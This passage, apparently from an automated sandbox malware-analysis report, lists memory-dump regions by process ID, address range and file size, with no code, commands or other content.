                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1492-296-0x0000000002000000-0x0000000002C4A000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/1492-295-0x0000000002000000-0x0000000002C4A000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/1536-312-0x0000000001F00000-0x0000000002B4A000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/1536-311-0x0000000001F00000-0x0000000002B4A000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/1556-226-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1604-299-0x00000000049E0000-0x00000000049E1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1604-300-0x00000000049E2000-0x00000000049E3000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1616-250-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1636-116-0x00000000002C0000-0x00000000002C1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1636-109-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1656-124-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1656-127-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                Filesize

                                                                                                                88KB

                                                                                                              • memory/1708-170-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1712-303-0x00000000049C0000-0x00000000049C1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1712-304-0x00000000049C2000-0x00000000049C3000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1736-94-0x00000000FF87246C-mapping.dmp
                                                                                                              • memory/1736-98-0x0000000000210000-0x0000000000280000-memory.dmp
                                                                                                                Filesize

                                                                                                                448KB

                                                                                                              • memory/1756-168-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1808-118-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1808-121-0x00000000005D0000-0x00000000005D2000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1920-89-0x0000000000260000-0x0000000000261000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1920-87-0x0000000000230000-0x0000000000231000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1920-93-0x000000001AF00000-0x000000001AF02000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1920-135-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1920-149-0x0000000000A70000-0x0000000000A72000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1920-76-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1920-85-0x0000000000D10000-0x0000000000D11000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1920-88-0x0000000000240000-0x000000000025C000-memory.dmp
                                                                                                                Filesize

                                                                                                                112KB

                                                                                                              • memory/1956-191-0x0000000001E16000-0x0000000001E35000-memory.dmp
                                                                                                                Filesize

                                                                                                                124KB

                                                                                                              • memory/1956-156-0x000007FEF2430000-0x000007FEF34C6000-memory.dmp
                                                                                                                Filesize

                                                                                                                16.6MB

                                                                                                              • memory/1956-151-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1956-164-0x0000000001E10000-0x0000000001E12000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1968-211-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1996-241-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2004-92-0x00000000009C0000-0x0000000000A1C000-memory.dmp
                                                                                                                Filesize

                                                                                                                368KB

                                                                                                              • memory/2004-90-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2004-91-0x0000000000710000-0x0000000000811000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/2004-69-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2028-65-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2060-232-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2088-297-0x0000000004990000-0x0000000004991000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2088-298-0x0000000004992000-0x0000000004993000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2096-237-0x00000000002B0000-0x0000000000321000-memory.dmp
                                                                                                                Filesize

                                                                                                                452KB

                                                                                                              • memory/2096-236-0x0000000000060000-0x00000000000AB000-memory.dmp
                                                                                                                Filesize

                                                                                                                300KB

                                                                                                              • memory/2096-235-0x00000000FF87246C-mapping.dmp
                                                                                                              • memory/2128-259-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2148-180-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                Filesize

                                                                                                                284KB

                                                                                                              • memory/2148-181-0x0000000000401480-mapping.dmp
                                                                                                              • memory/2148-184-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                Filesize

                                                                                                                284KB

                                                                                                              • memory/2160-270-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2160-285-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-272-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-274-0x00000000046B0000-0x00000000046B1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-275-0x0000000004672000-0x0000000004673000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-289-0x0000000006250000-0x0000000006251000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-290-0x0000000006280000-0x0000000006281000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-283-0x00000000061B0000-0x00000000061B1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-280-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-276-0x0000000004620000-0x0000000004621000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2160-273-0x0000000004670000-0x0000000004671000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2176-251-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2224-238-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2268-187-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                Filesize

                                                                                                                3.5MB

                                                                                                              • memory/2268-185-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                Filesize

                                                                                                                3.5MB

                                                                                                              • memory/2268-186-0x00000001401FBC30-mapping.dmp
                                                                                                              • memory/2284-277-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2296-244-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2320-308-0x0000000004A12000-0x0000000004A13000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2320-307-0x0000000004A10000-0x0000000004A11000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2324-192-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.0MB

                                                                                                              • memory/2324-189-0x00000001402CA898-mapping.dmp
                                                                                                              • memory/2324-198-0x0000000000640000-0x0000000000660000-memory.dmp
                                                                                                                Filesize

                                                                                                                128KB

                                                                                                              • memory/2324-188-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.0MB

                                                                                                              • memory/2344-313-0x0000000002070000-0x0000000002CBA000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/2344-314-0x0000000002070000-0x0000000002CBA000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/2480-206-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2520-193-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2536-202-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2560-194-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2572-255-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2596-195-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2620-196-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2696-216-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2728-218-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2740-253-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2744-262-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2768-204-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2816-209-0x00000000002C0000-0x00000000002D0000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/2816-210-0x00000000002F0000-0x0000000000302000-memory.dmp
                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/2816-207-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2824-212-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2864-260-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2884-257-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2892-249-0x00000000002F0000-0x0000000000302000-memory.dmp
                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/2892-248-0x00000000002C0000-0x00000000002D0000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/2892-246-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2908-233-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2928-301-0x0000000004980000-0x0000000004981000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2928-302-0x0000000004982000-0x0000000004983000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2936-252-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2972-279-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3004-294-0x0000000004B12000-0x0000000004B13000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/3004-309-0x0000000002820000-0x000000000346A000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/3004-293-0x0000000004B10000-0x0000000004B11000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/3004-292-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3004-310-0x0000000002820000-0x000000000346A000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.3MB

                                                                                                              • memory/3032-265-0x0000000000402F68-mapping.dmp
                                                                                                              • memory/3032-264-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                Filesize

                                                                                                                48KB

                                                                                                              • memory/3044-221-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3044-224-0x00000000001B0000-0x00000000002B1000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/3044-223-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/3044-225-0x00000000009C0000-0x0000000000A1C000-memory.dmp
                                                                                                                Filesize

                                                                                                                368KB

                                                                                                              • memory/3048-214-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3048-230-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3052-219-0x0000000000000000-mapping.dmp